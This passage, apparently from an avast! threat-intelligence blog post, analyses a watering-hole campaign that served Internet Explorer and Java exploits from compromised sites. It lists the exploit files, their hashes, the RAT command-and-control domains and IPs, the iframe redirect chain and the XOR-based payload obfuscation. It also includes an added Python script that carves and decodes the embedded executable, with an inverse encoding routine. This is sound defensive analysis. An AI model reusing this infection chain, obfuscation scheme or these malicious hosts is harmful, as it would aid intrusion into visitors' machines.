  • "DOITYOUR02.html" (cf394f4619db14d335dde12ca9657656): traditional "DOITYOUR" variant of "news.html".
  • "DOITYOUR01.txt" (a1f6e988cfaa4d7a910183570cde0dc0): traditional "DOITYOUR" variant of "robots.txt".

The "newsite.acmetoy.com" website also hosts the following Java-vulnerability related files:

  • "javapdf.html" (b32bf36160c7a3cc5bc765672f7d6f2c): JavaScript file for CVE-2013-0422 or CVE-2011-3544 exploitation.
  • "AppletHigh.jar" (f02ffa2b293ff370d0ea3499d0ade9bd): CVE-2013-0422 exploit.
  • "AppletLow.jar" (1da8f77dde43f55585896eddaff43896): CVE-2011-3544 exploit.

98.129.194.210 analysis

The "98.129.194.210" website hosts the following Java-vulnerability related files. As you can see, they are exactly the same as above and most probably serve only as a backup server in case of takedown.

  • "java.html" (b32bf36160c7a3cc5bc765672f7d6f2c): JavaScript file for CVE-2013-0422 or CVE-2011-3544 exploitation.
  • "AppletHigh.jar" (f02ffa2b293ff370d0ea3499d0ade9bd): CVE-2013-0422 exploit.
  • "AppletLow.jar" (1da8f77dde43f55585896eddaff43896): CVE-2011-3544 exploit.

These binaries were dropped by the exploits:

  • 686D0E4FAEE4B0EF93A8B9550BD544BF334A6D9B495EC7BE9E28A0F681F5495C, a remote access tool (RAT) programmed to contact "luckmevnc.myvnc.com" (112.140.186.252, Singapore) or "luckmegame.servegame.com" (currently parked).
  • A14CCC5922EFC6C7CEC1BB58C607381C99967ED4B7602B7427B081209AAF1656, an interesting injector which downloads something pretending to be an error web page, decodes its content, which is in fact position-independent code, and injects it into another process. This is also a RAT, contacting "d.wt.ikwb.com" (58.64.179.139, Hong Kong).

We have contacted the RSF webmaster and the code should already be removed. avast! and other anti-virus users are protected on multiple levels against this threat; updating the vulnerable software packages to their latest versions is also a must. Or get rid of them: most users can safely replace MSIE with another browser and completely uninstall Java, reducing the attack surface.

Watering Hole Campaign Use Latest Java and IE Vulnerabilities

Through a collaboration between Jindrich Kubec (@Jindroush), Director of Threat Intelligence at avast!, and Eric Romang (@eromang), independent security researcher, we can confirm that the watering hole campaigns are still ongoing, targeting multiple high-value websites, including for example a major Hong Kong political party. We can also confirm that a second major Hong Kong political party is a victim of this watering hole campaign.

This website is currently using the new version of the original Internet Explorer (CVE-2012-4792) attack, patched in MS13-008, but right now it is also using the latest Java (CVE-2013-0422) vulnerability, patched in Oracle Java 7 Update 11.

We will provide further details on the affected websites after they have been cleaned.

The Chinese-language version of the targeted website includes a remote JavaScript file from "hxxp://www.[REDACTED].org/board/data/m/m.js".

malicious-javascript-inclusion

This website is a legitimate compromised website, hosted in South Korea, used for hosting the exploit files.

The included file uses the well-known "deployJava" function from "deployJava.js", and creates a cookie named "Somethingeeee" with a one-day expiration. This cookie is quite strange, and it can also be found in years-old exploits, which suggests this is only one part of a greater, long-running operation.

mt.html-file-2

If Internet Explorer 8 is used, an iframe is loaded from "hxxp://www.[REDACTED].org/board/data/m/mt.html". Otherwise, if Oracle Java is detected, an iframe loads "hxxp://www.[REDACTED].org/board/data/m/javamt.html".

Analysis of "mt.html"

"mt.html" (d85e34827980b13c9244cbcab13b35ea) is an obfuscated JavaScript file which attempts to exploit the latest Internet Explorer vulnerability, CVE-2012-4792, fixed in MS13-008 and released by Microsoft on Monday morning.

https://www.virustotal.com/file/58588ce6d0a1e042450946b03fa4cd92ac1b4246cb6879a7f50a0aab2a84086a/analysis/ (avast! detects this code as JS:Bogidow-A [Expl] through its Script Shield component).

Compared to the original CFR and Capstone Turbine versions, this code does not target a specific browser language, but it is based on the version used on CFR with the "boy" and "girl" patterns.

The traditional "today.swf" has been replaced by "logo1229.swf" (da0287b9ebe79bee42685510ac94dc4f), "news.html" by "DOITYOUR02.html" (cf394f4619db14d335dde12ca9657656) and "robots.txt" by "DOITYOUR01.txt" (a1f6e988cfaa4d7a910183570cde0dc0). The traditional dropper "xsainfo.jpg" is now embedded in the "mt.html" file and obfuscated in the JavaScript.

The executable can be extracted from the string by cutting off the first 13 characters, converting the hex characters to binary and XORing the whole blob with 0xBF. The resulting file, SHA256 CE6C5D2DCF5E9BDECBF15E95943F4FFA845F8F07ED2D10FD6E544F30A9353AD2, is a RAT communicating with a domain hosted in Hong Kong by New World Telecom.
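The extraction step just described (skip 13 characters, hex-decode, XOR every byte with 0xBF) is small enough to write down completely. The script below is an added example for this page, not code from mt.html or from the authors' analysis. `extract_payload` is the recovery routine; `embed_payload` is its inverse, included only to build a constructed test blob, and the 13-character prefix it uses is a placeholder since the page does not reproduce the real one. `carve_from_html` assumes the blob sits in a double-quoted JavaScript string literal and picks the longest candidate, which is an assumption about the page layout rather than something the page states.

```python
"""Recover the XOR-obfuscated executable embedded in mt.html (added example)."""
import binascii
import re

XOR_KEY = 0xBF
PREFIX_LEN = 13


def extract_payload(blob, prefix_len=PREFIX_LEN, key=XOR_KEY):
    """Drop the prefix, hex-decode the rest and XOR each byte with the key.
    Raises binascii.Error on odd-length or non-hex input."""
    hexdata = blob[prefix_len:].strip()
    raw = binascii.unhexlify(hexdata)
    return bytes(b ^ key for b in raw)


def embed_payload(payload, prefix="prefix-13chr:", key=XOR_KEY):
    """Inverse transform used only to build test data; the prefix is a placeholder."""
    assert len(prefix) == PREFIX_LEN
    return prefix + binascii.hexlify(bytes(b ^ key for b in payload)).decode()


def looks_like_pe(data):
    """Cheap sanity check that the decoded bytes start like a Windows executable."""
    return data[:2] == b"MZ" and len(data) > 0x40


def carve_from_html(html):
    """Locate the obfuscated literal in a script body and decode it.
    Assumes a double-quoted JS string of 13 prefix characters followed by hex."""
    cands = re.findall(r'"([^"]{13}[0-9a-fA-F]{40,})"', html)
    if not cands:
        return None
    return extract_payload(max(cands, key=len))


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
        out = carve_from_html(fh.read())
    if out is None:
        print("no candidate string found")
    else:
        with open("carved.bin", "wb") as fh:
            fh.write(out)
        print("carved", len(out), "bytes; PE header:", looks_like_pe(out))
```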

Analysis of "javamt.html"

"javamt.html" (b32bf36160c7a3cc5bc765672f7d6f2c) checks whether Oracle Java 7 is present; if so, the latest Java vulnerability, CVE-2013-0422, is exploited through "AppletHigh.jar" (521eab796271254793280746dbfd9951). If Oracle Java 6 is present, "AppletLow.jar" (2062203f0ecdaf60df34b5bdfd8eacdc) exploits CVE-2011-3544. Both applets contain the very same binary mentioned above (unencrypted).

javamt.html-file

Conclusion

As you can see, the watering hole campaign still continues, but it has evolved both in form and by using the latest Oracle Java vulnerability. There is just one piece of advice: patch, patch, patch... and see you soon.